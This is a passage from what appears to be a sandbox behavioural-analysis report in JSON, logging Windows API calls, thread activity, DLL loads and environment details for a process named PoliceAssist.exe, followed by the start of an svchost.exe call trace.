          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "1596",
            "caller": "0x7ffec77bb648",
            "parentcaller": "0x7ffec779c7cd",
            "category": "network",
            "api": "WSARecv",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              }
            ],
            "repeated": 0,
            "id": 1960
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "1596",
            "caller": "0x7ffedfaacb7e",
            "parentcaller": "0x7ffedfaac903",
            "category": "network",
            "api": "SslDecryptPacket",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Buffer",
                "value": "0\r\n\r\n"
              },
              {
                "name": "SequenceNumber",
                "value": "2"
              },
              {
                "name": "BufferSize",
                "value": "5"
              }
            ],
            "repeated": 0,
            "id": 1961
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSendRequest",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              },
              {
                "name": "Headers",
                "value": ""
              },
              {
                "name": "Optional",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1962
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpReceiveResponse",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              }
            ],
            "repeated": 2,
            "id": 1963
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpQueryHeaders",
            "status": false,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              }
            ],
            "repeated": 1,
            "id": 1964
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WSARecv",
            "status": false,
            "return": "0xffffffffffffffff",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              }
            ],
            "repeated": 0,
            "id": 1965
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000003f0"
              }
            ],
            "repeated": 0,
            "id": 1966
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000044c"
              }
            ],
            "repeated": 1,
            "id": 1967
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000003f0"
              }
            ],
            "repeated": 1,
            "id": 1968
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000044c"
              }
            ],
            "repeated": 0,
            "id": 1969
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpQueryHeaders",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              }
            ],
            "repeated": 0,
            "id": 1970
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\mlang"
              },
              {
                "name": "DllBase",
                "value": "0x7ffec5430000"
              }
            ],
            "repeated": 0,
            "id": 1971
          },
          {
            "timestamp": "2025-11-20 10:58:35,609",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\mlang.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffec5430000"
              }
            ],
            "repeated": 0,
            "id": 1972
          },
          {
            "timestamp": "2025-11-20 10:58:35,609",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "275C23E2-3747-11D0-9FEA-00AA003F8646"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "275C23E1-3747-11D0-9FEA-00AA003F8646"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1973
          },
          {
            "timestamp": "2025-11-20 10:58:35,609",
            "thread_id": "2188",
            "caller": "0x14001f728",
            "parentcaller": "0x14003ee1c",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x1401313e0",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#14"
              },
              {
                "name": "Name",
                "value": "#206"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1974
          },
          {
            "timestamp": "2025-11-20 10:58:35,609",
            "thread_id": "2188",
            "caller": "0x14001f728",
            "parentcaller": "0x14003ee1c",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x1401391cc",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x1401313e0"
              }
            ],
            "repeated": 0,
            "id": 1975
          },
          {
            "timestamp": "2025-11-20 10:58:35,609",
            "thread_id": "2188",
            "caller": "0x14001f728",
            "parentcaller": "0x14003ee1c",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x140131340",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#3"
              },
              {
                "name": "Name",
                "value": "#4"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1976
          },
          {
            "timestamp": "2025-11-20 10:58:35,609",
            "thread_id": "2188",
            "caller": "0x14001f728",
            "parentcaller": "0x14003ee1c",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140134f10",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x140131340"
              }
            ],
            "repeated": 0,
            "id": 1977
          },
          {
            "timestamp": "2025-11-20 10:58:35,609",
            "thread_id": "2188",
            "caller": "0x14001f744",
            "parentcaller": "0x14003ee1c",
            "category": "windows",
            "api": "FindWindowW",
            "status": true,
            "return": "0x00010098",
            "arguments": [
              {
                "name": "ClassName",
                "value": "Shell_TrayWnd"
              },
              {
                "name": "WindowName",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1978
          },
          {
            "timestamp": "2025-11-20 10:58:35,625",
            "thread_id": "2188",
            "caller": "0x1400b404f",
            "parentcaller": "0x140037c90",
            "category": "windows",
            "api": "PostMessageW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "WindowHandle",
                "value": "0x000b02a0"
              },
              {
                "name": "Message",
                "value": "0x00000044"
              }
            ],
            "repeated": 0,
            "id": 1979
          },
          {
            "timestamp": "2025-11-20 10:58:35,656",
            "thread_id": "2188",
            "caller": "0x1400b4073",
            "parentcaller": "0x140037c90",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "comctl32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf5a0000"
              }
            ],
            "repeated": 1,
            "id": 1980
          },
          {
            "timestamp": "2025-11-20 10:58:35,672",
            "thread_id": "2188",
            "caller": "0x1400b4073",
            "parentcaller": "0x140037c90",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\ntmarta"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedfcb0000"
              }
            ],
            "repeated": 0,
            "id": 1981
          },
          {
            "timestamp": "2025-11-20 10:58:35,672",
            "thread_id": "2188",
            "caller": "0x1400b4073",
            "parentcaller": "0x140037c90",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\CoreMessaging"
              },
              {
                "name": "DllBase",
                "value": "0x7ffede0b0000"
              }
            ],
            "repeated": 0,
            "id": 1982
          },
          {
            "timestamp": "2025-11-20 10:58:35,672",
            "thread_id": "2188",
            "caller": "0x1400b4073",
            "parentcaller": "0x140037c90",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\wintypes"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedc8a0000"
              }
            ],
            "repeated": 0,
            "id": 1983
          },
          {
            "timestamp": "2025-11-20 10:58:35,672",
            "thread_id": "2188",
            "caller": "0x1400b4073",
            "parentcaller": "0x140037c90",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\CoreUIComponents"
              },
              {
                "name": "DllBase",
                "value": "0x7ffeddd50000"
              }
            ],
            "repeated": 0,
            "id": 1984
          },
          {
            "timestamp": "2025-11-20 10:58:35,672",
            "thread_id": "2188",
            "caller": "0x1400b4073",
            "parentcaller": "0x140037c90",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\textinputframework"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed8f50000"
              }
            ],
            "repeated": 0,
            "id": 1985
          },
          {
            "timestamp": "2025-11-20 10:58:35,687",
            "thread_id": "2188",
            "caller": "0x1400b2754",
            "parentcaller": "0x140056af0",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\msctf.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee21a0000"
              }
            ],
            "repeated": 0,
            "id": 1986
          },
          {
            "timestamp": "2025-11-20 10:59:16,219",
            "thread_id": "4536",
            "caller": "0x7ffee0bdc7dd",
            "parentcaller": "0x7ffee34e865b",
            "category": "registry",
            "api": "RegNotifyChangeKeyValue",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\"
              },
              {
                "name": "NotifyFilter",
                "value": "0x10000004"
              },
              {
                "name": "WatchSubtree",
                "value": "0"
              },
              {
                "name": "Asynchronous",
                "value": "1"
              }
            ],
            "repeated": 1,
            "id": 1987
          },
          {
            "timestamp": "2025-11-20 10:59:24,047",
            "thread_id": "1596",
            "caller": "0x7ffec77bf96a",
            "parentcaller": "0x7ffee34e16e9",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1988
          },
          {
            "timestamp": "2025-11-20 10:59:25,812",
            "thread_id": "1704",
            "caller": "0x7ffee34c467e",
            "parentcaller": "0x7ffee34c3748",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "12"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "1704"
              }
            ],
            "repeated": 0,
            "id": 1989
          },
          {
            "timestamp": "2025-11-20 10:59:25,812",
            "thread_id": "2336",
            "caller": "0x7ffee34c469e",
            "parentcaller": "0x7ffee34c3748",
            "category": "threading",
            "api": "NtTerminateThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0x00000000"
              },
              {
                "name": "ExitStatus",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "0"
              },
              {
                "name": "ProcessId",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1990
          },
          {
            "timestamp": "2025-11-20 10:59:25,812",
            "thread_id": "3704",
            "caller": "0x7ffee34c467e",
            "parentcaller": "0x7ffee34c3748",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "12"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "3704"
              }
            ],
            "repeated": 0,
            "id": 1991
          },
          {
            "timestamp": "2025-11-20 10:59:25,812",
            "thread_id": "3704",
            "caller": "0x7ffee34c469e",
            "parentcaller": "0x7ffee34c3748",
            "category": "threading",
            "api": "NtTerminateThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0x00000000"
              },
              {
                "name": "ExitStatus",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "0"
              },
              {
                "name": "ProcessId",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1992
          },
          {
            "timestamp": "2025-11-20 10:59:28,437",
            "thread_id": "1596",
            "caller": "0x7ffee3347042",
            "parentcaller": "0x7ffee3346fa4",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004ac"
              }
            ],
            "repeated": 0,
            "id": 1993
          },
          {
            "timestamp": "2025-11-20 10:59:28,437",
            "thread_id": "1596",
            "caller": "0x7ffee3347042",
            "parentcaller": "0x7ffee3346fa4",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000304"
              }
            ],
            "repeated": 0,
            "id": 1994
          },
          {
            "timestamp": "2025-11-20 10:59:28,437",
            "thread_id": "1596",
            "caller": "0x7ffee3347042",
            "parentcaller": "0x7ffee3346fa4",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002b8"
              }
            ],
            "repeated": 0,
            "id": 1995
          },
          {
            "timestamp": "2025-11-20 10:59:32,875",
            "thread_id": "2432",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000304"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 1996
          },
          {
            "timestamp": "2025-11-20 11:00:14,031",
            "thread_id": "1596",
            "caller": "0x7ffec77bf96a",
            "parentcaller": "0x7ffee34e16e9",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1997
          },
          {
            "timestamp": "2025-11-20 11:00:24,047",
            "thread_id": "1596",
            "caller": "0x7ffec77c2f51",
            "parentcaller": "0x7ffec77c2e76",
            "category": "network",
            "api": "shutdown",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              },
              {
                "name": "how",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 1998
          },
          {
            "timestamp": "2025-11-20 11:00:24,047",
            "thread_id": "1596",
            "caller": "0x7ffec77c2f60",
            "parentcaller": "0x7ffec77c2e76",
            "category": "network",
            "api": "closesocket",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              }
            ],
            "repeated": 0,
            "id": 1999
          },
          {
            "timestamp": "2025-11-20 11:00:24,047",
            "thread_id": "3408",
            "caller": "0x7ffee0a47358",
            "parentcaller": "0x7ffee0a470ef",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "0",
                "pretty_value": "ThreadBasicInformation"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x03\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0 \\x00\\x00\\x00\\x00\\x00\\xec\\x0c\\x00\\x00\\x00\\x00\\x00\\x00P\r\\x00\\x00\\x00\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "3408"
              }
            ],
            "repeated": 0,
            "id": 2000
          },
          {
            "timestamp": "2025-11-20 11:00:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffed8a51ba7",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000454"
              }
            ],
            "repeated": 0,
            "id": 2001
          },
          {
            "timestamp": "2025-11-20 11:00:36,219",
            "thread_id": "2432",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee2fe3081",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000032c"
              }
            ],
            "repeated": 0,
            "id": 2002
          },
          {
            "timestamp": "2025-11-20 11:00:39,812",
            "thread_id": "4488",
            "caller": "0x7ffee34c467e",
            "parentcaller": "0x7ffee34c3748",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "12"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "4488"
              }
            ],
            "repeated": 0,
            "id": 2003
          },
          {
            "timestamp": "2025-11-20 11:00:39,812",
            "thread_id": "4488",
            "caller": "0x7ffee34c469e",
            "parentcaller": "0x7ffee34c3748",
            "category": "threading",
            "api": "NtTerminateThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0x00000000"
              },
              {
                "name": "ExitStatus",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "0"
              },
              {
                "name": "ProcessId",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 2004
          },
          {
            "timestamp": "2025-11-20 11:01:04,016",
            "thread_id": "3408",
            "caller": "0x7ffec77bf96a",
            "parentcaller": "0x7ffee34e16e9",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 2005
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee2fe2f2d",
            "parentcaller": "0x7ffee2fe2d59",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "16"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "2432"
              }
            ],
            "repeated": 0,
            "id": 2006
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee2fe2ec5",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000032c"
              }
            ],
            "repeated": 0,
            "id": 2007
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee2f6cd6e",
            "parentcaller": "0x7ffee2fe2ed4",
            "category": "system",
            "api": "IsDebuggerPresent",
            "status": false,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 2008
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee2fe4324",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000310"
              }
            ],
            "repeated": 0,
            "id": 2009
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee34c467e",
            "parentcaller": "0x7ffee110f79a",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "12"
              },
              {
                "name": "ThreadInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "ThreadId",
                "value": "2432"
              }
            ],
            "repeated": 0,
            "id": 2010
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1831000"
              },
              {
                "name": "ModuleName",
                "value": "ole32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 2011
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1831000"
              },
              {
                "name": "ModuleName",
                "value": "ole32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 2012
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee2fe722d",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000324"
              }
            ],
            "repeated": 0,
            "id": 2013
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee2fe723d",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000328"
              }
            ],
            "repeated": 0,
            "id": 2014
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee339e41e",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000304"
              }
            ],
            "repeated": 0,
            "id": 2015
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee339e4e4",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002b8"
              }
            ],
            "repeated": 0,
            "id": 2016
          },
          {
            "timestamp": "2025-11-20 11:01:35,594",
            "thread_id": "2432",
            "caller": "0x7ffee34c469e",
            "parentcaller": "0x7ffee110f79a",
            "category": "threading",
            "api": "NtTerminateThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0x00000000"
              },
              {
                "name": "ExitStatus",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "0"
              },
              {
                "name": "ProcessId",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 2017
          }
        ],
        "threads": [
          "2188",
          "2060",
          "1600",
          "404",
          "3824",
          "2432",
          "1596",
          "3408",
          "4536",
          "1704",
          "2336",
          "3704",
          "4488"
        ],
        "environ": {
          "UserName": "Admin",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "\"C:\\Temp\\PoliceAssist.exe\" ",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x140000000",
          "MainExeSize": "0x0013a000",
          "Bitness": "64-bit"
        },
        "file_activities": {
          "read_files": [],
          "write_files": [],
          "delete_files": []
        }
      },
      {
        "process_id": 740,
        "process_name": "svchost.exe",
        "parent_id": 600,
        "module_path": "C:\\Windows\\System32\\svchost.exe",
        "first_seen": "2025-11-20 10:58:26,323",
        "calls": [
          {
            "timestamp": "2025-11-20 10:58:29,792",
            "thread_id": "912",
            "caller": "0x7ffee10ec5f2",
            "parentcaller": "0x7ffee10e89f3",
            "category": "process",
            "api": "NtCreateUserProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0x00000e5c"
              },
              {
                "name": "ThreadHandle",
                "value": "0x00000eb4"
              },
              {
                "name": "ProcessDesiredAccess",
                "value": "0x02000000"
              },
              {
                "name": "ThreadDesiredAccess",
                "value": "0x02000000"
              },
              {
                "name": "ProcessFileName",
                "value": ""
              },
              {
                "name": "ThreadName",
                "value": ""
              },
              {
                "name": "ImagePathName",
                "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe"
              },
              {
                "name": "CommandLine",
                "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
              },
              {
                "name": "DllPath",
                "value": ""
              },
              {
                "name": "ProcessId",
                "value": "140728898423900"
              }
            ],
            "repeated": 0,
            "id": 0
          },
          {
            "timestamp": "2025-11-20 10:58:30,636",
            "thread_id": "324",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000f0c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1
